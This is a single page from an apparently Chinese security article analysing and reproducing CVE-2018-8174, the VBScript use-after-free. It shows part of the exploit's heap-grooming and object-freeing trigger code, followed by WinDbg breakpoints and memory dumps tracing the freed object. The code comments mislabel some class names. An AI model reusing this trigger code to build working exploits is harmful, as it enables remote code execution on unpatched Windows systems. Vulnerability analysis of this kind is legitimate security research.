CVE-2018-8174双杀漏洞分析复现及防御
来源:岁月联盟
时间:2020-01-29
For i=20 To 39
Set array(i)=New MyClass2 '占据系统堆碎片
Next
'--------------------------------------------------------------------------
For i=0 To 6
ReDim array_a(1)
Set array_a(1)=New Trigger
Erase array_a 'array_b保存了对已经释放的Trigger obj的引用
Next
IsEmpty(array_b)
Set MyClass2_obj1=New MyClass2 '同时MyClass2_obj2对它占位
IsEmpty(MyClass2_obj1)
'--------------------------------------------------------------------------
spec_int_2=0
For i=0 To 6
ReDim array_a(1)
Set array_a(1)=New cla2 'array_c保存了对已经释放的 cla2 obj 的引用
Erase array_a
Next
IsEmpty(array_c)
Set MyClass2_obj2=New MyClass2 '同时MyClass2_obj2对它占位
IsEmpty(MyClass2_obj2)
End Sub
//断点:
0:005> bl
0 e 710b4124 0001 (0001) 0:**** vbscript!VBScriptClass::TerminateClass ".printf /"Class %mu at %x, terminate called//n/", poi(@ecx + 0x24), @ecx; g"
2 e 710b463d 0001 (0001) 0:**** vbscript!VBScriptClass::Create+0x63 ".printf /"Class %mu created at %x//n/", poi(@esi + 0x24), @esi; g"
3 e 710bc206 0001 (0001) 0:**** vbscript!VbsIsEmpty
第一次IsEmpty断点,参数为array_b:
//参数传入的array_b,进入函数后栈空间可以查看
Breakpoint 3 hit
eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001
eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
vbscript!VbsIsEmpty:
6ab2c206 8bff mov edi,edi
0:006> dd poi(esp+C)
0049f1a0 0000600c 00000000 01051100 0034c4c8 //0034c4c8 是array_b 的data buffer
0049f1b0 02890002 0049ffc0 01050013 0289c9c0
0049f1c0 02890002 0049ffc0 01050001 0289c9c0
0049f1d0 6ab10002 0289c9fc 02890027 0049ffc0
0049f1e0 6ab10002 0289c9fc 02890001 0049ffc0
0049f1f0 6ab10002 0289c9fc 02890006 0049ffc0
0049f200 6ab10002 0289c9fc 02890001 0049ffc0
0049f210 00000000 00000000 00000000 00000000
0:006> dt ole32!safearray 0034c4c8
+0x000 cDims : 1
+0x002 fFeatures : 0x892
+0x004 cbElements : 0x10
+0x008 cLocks : 0
+0x00c pvData : 0x00371a68 Void //array_b数据元素地址
+0x010 rgsabound : [1] tagSAFEARRAYBOUND
0:006> dd 00371a68
00371a68 01030009 00000000 010526e0 00000000 //010526e0类对象地址
00371a78 6ab10009 010526e4 010526e0 6ab14211
00371a88 6ab10009 010526e4 010526e0 6ab14211
00371a98 6ab10009 010526e4 010526e0 6ab14211
00371aa8 6ab10009 010526e4 010526e0 6ab14211
00371ab8 6ab10009 010526e4 010526e0 6ab14211
00371ac8 6ab10009 010526e4 010526e0 6ab14211
00371ad8 5e2b1c44 88000000 0030007b 0030002e
0:006> dd 010526e0
010526e0 6ab100c6 00000000 00000000 00000000 //引用计数已经为0
010526f0 00000808 00000000 00000000 0103799c
01052700 00000001 003af554 00000000 00000000
01052710 5e163a1d 80000000 000000cd 00000000
0:006> du 003af554
003af554 "Trigger"
第二次IsEmpty断点,此时 cla4_obj1 占位已经完成:
//仍然查看10526e0类对象地址
Class cla4 created at 10526e0
Breakpoint 3 hit
eax=6ab1185c ebx=0289cb64 ecx=6ab6a9d8 edx=0289cadc esi=0104783c edi=00000001
eip=6ab2c206 esp=0289c9f8 ebp=0289ca08 iopl=0 nv up ei pl zr na pe nc
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] 下一页
![[图]0patch发布免费补丁:修复Windows 7中的本地提权漏洞](/d/file/20220219/e9aad0aaba7c532532f19474d675f2d0.png)
![[图]微软:WES7已于10月13日停止支持 推荐客户尽快升级](/d/file/20220219/f65a8e8c7ce9e40e08ec09b40dc2c64e.png)
